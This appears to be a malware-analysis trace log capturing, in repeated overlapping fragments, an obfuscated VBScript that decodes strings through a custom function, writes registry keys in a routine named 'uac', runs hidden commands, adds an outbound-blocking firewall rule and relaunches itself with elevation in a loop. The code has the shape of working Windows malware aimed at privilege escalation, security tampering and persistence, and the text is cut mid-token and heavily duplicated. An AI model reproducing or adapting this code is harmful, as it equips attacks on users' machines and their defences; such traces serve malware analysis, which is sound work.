bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.346] wcsncmp (_String1="rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.346] wcsncmp (_String1="ule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 104 [0226.346] wcsncmp (_String1="le.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.346] wcsncmp (_String1="e.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute 